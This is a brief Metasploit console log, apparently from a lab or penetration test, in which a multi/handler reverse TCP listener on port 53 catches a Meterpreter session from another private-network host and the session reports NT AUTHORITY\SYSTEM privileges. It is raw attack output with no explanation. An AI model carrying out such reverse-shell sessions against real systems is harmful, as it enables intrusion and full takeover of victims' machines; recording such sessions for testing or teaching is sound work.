msfexploit(multi/handler) >exploit[*] Started reverse TCP handler on 192.168.1.4:53[*] Sending stage (179779bytes) to 192.168.1.119[*] Meterpreter session 11 opened (192.168.1.4:53 ‐>192.168.1.119:131) at 2019‐01‐20 05:43:32 ‐0500 meterpreter>getuidServerusername:NTAUTHORITY\SYSTEMmeterpreter>getpidCurrentpid:728meterpreter>